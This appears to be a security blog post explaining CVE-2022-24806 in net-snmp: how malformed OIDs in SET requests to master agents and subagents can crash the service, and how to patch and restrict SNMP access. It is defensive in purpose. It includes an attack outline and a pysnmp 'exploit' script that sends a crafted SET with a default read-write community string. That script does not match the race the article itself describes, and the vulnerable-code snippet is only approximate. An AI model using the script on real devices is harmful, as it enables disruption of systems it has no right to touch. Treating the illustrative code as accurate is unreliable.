CVE-2022-24806 - How Malformed OIDs in net-snmp Can Be Exploited — What You Need To Know

Net-SNMP is a very common set of tools used to monitor and manage devices using the Simple Network Management Protocol (SNMP). Thousands of networked devices, servers, and embedded systems rely on net-snmp every day. But in April 2022, a security flaw was disclosed: CVE-2022-24806. This post will break down, in simple terms, what the vulnerability is, how it can be exploited, and what can be done to avoid falling victim.

What Is CVE-2022-24806?

CVE-2022-24806 describes an *improper input validation* vulnerability in net-snmp (versions before 5.9.2). If an attacker has read-write access, they can send specially crafted commands (OID SET requests) to both the main snmpd agent and its subagents at the same time (using AgentX or SMUX protocols). This can cause unexpected behavior, potentially allowing further exploitation like denial of service or even arbitrary code execution.

SNMP Basics

SNMP operates with OIDs (Object Identifiers) — think of them like addresses for specific settings or stats you can read or write on a device. A SET request changes a value. Normally, SNMP agents validate these requests strictly.

The Vulnerability

Prior to version 5.9.2, net-snmp failed to properly validate some malformed OIDs when those SET operations were handled between the master agent (snmpd) and subagents. If both the master and a subagent see a malformed OID in a SET request at the same time, the code could "get confused," creating conditions for security issues like invalid memory access.

Code Snippet Example

The exploitation relates to how SET requests are propagated and validated. The vulnerable code, from earlier net-snmp versions, (source: net-snmp PR #356) lacked proper length and format checks, something like:

if (reqinfo->mode == MODE_SET_RESERVE1) {
    if (var_val_type != ASN_OCTET_STR) {
        /* Missing: Detailed OID validation */
        netsnmp_set_request_error(reqinfo, request, SNMP_ERR_WRONGTYPE);
    }
}

A SET request with a malformed OID might sneak past these weak checks, especially if two processes (master and subagent) process SET requests for the same OID nearly simultaneously.

An attacker needs read-write SNMP credentials. Here’s a simplified exploit path

1. Find Credentials: The attacker locates default, weak, or leaked SNMP read-write credentials. (SNMPv2c community string or SNMPv3 username/password.)
2. Craft Malformed OID: Using net-snmp tools or custom Python code, they prepare a SET request with a specially designed OID that violates the expected format.
3. Send SET Requests Rapidly: The attacker fires multiple SET requests at both the master agent and subagent endpoints, trying to trigger a race condition and improper handling.
4. Result: This can cause the agent to crash (denial of service) or possibly overwrite memory structures, depending on system and timing.

Example Exploit (Python Using pysnmp)

from pysnmp.hlapi import *

errorIndication, errorStatus, errorIndex, varBinds = next(
    setCmd(SnmpEngine(),
           CommunityData('private', mpModel=1),  # read-write community string
           UdpTransportTarget(('target-ip', 161)),
           ContextData(),
           ObjectType(ObjectIdentity('1.3.6.1.2.1.1.9999999'), # Malformed OID
                      OctetString('bad-input')))
)

if errorIndication:
    print('Attack sent: ', errorIndication)
elif errorStatus:
    print('Error: ', errorStatus.prettyPrint())
else:
    print('Possible success. Check agent stability.')

Warning: Don’t use this code on systems you do not own.

Original Vulnerability Announcement & References

- CVE-2022-24806 at NVD
- net-snmp advisory
- net-snmp Pull Request #356 Discussion
- Release notes 5.9.2 (fix)

How To Protect Your Systems

1. Upgrade net-snmp:
Patch your systems by upgrading to net-snmp 5.9.2 or later. This version added strict validation to block malformed OIDs.

2. Use SNMPv3 Where Possible:
SNMPv3 supports real user authentication and encryption. Don’t use default configs.

3. Strengthen Credentials:

For SNMPv3: Use complex passwords and keep usernames secret.

- For SNMPv1/v2c: Use long, random community strings (not "public" or "private").

4. Restrict Access:

Configure SNMP agents to only answer from trusted IP addresses or management subnets. Example

# snmpd.conf
rocommunity public 10.../24
rwcommunity strongsecret 10...5

5. Monitor Logs:
Watch for failed or weird SET requests in your snmpd logs — could signal attempts to exploit.

TL;DR (Too Long; Didn't Read)

- CVE-2022-24806 lets users with SNMP write access crash net-snmp via malformed OIDs, especially if subagents are involved.

Requires the attacker to have read-write credentials, so protecting those is crucial.

- Fix: Upgrade to net-snmp 5.9.2+ and limit SNMP access by user/host/network.


Be Safe!
Check your systems for old net-snmp. Set strong SNMP credentials. Upgrade now, and you won’t have to worry about this bug.


*This article is exclusive — if it helped you, share with your IT/security crew and help everyone stay safer on the net.*

Timeline

Published on: 04/16/2024 20:15:08 UTC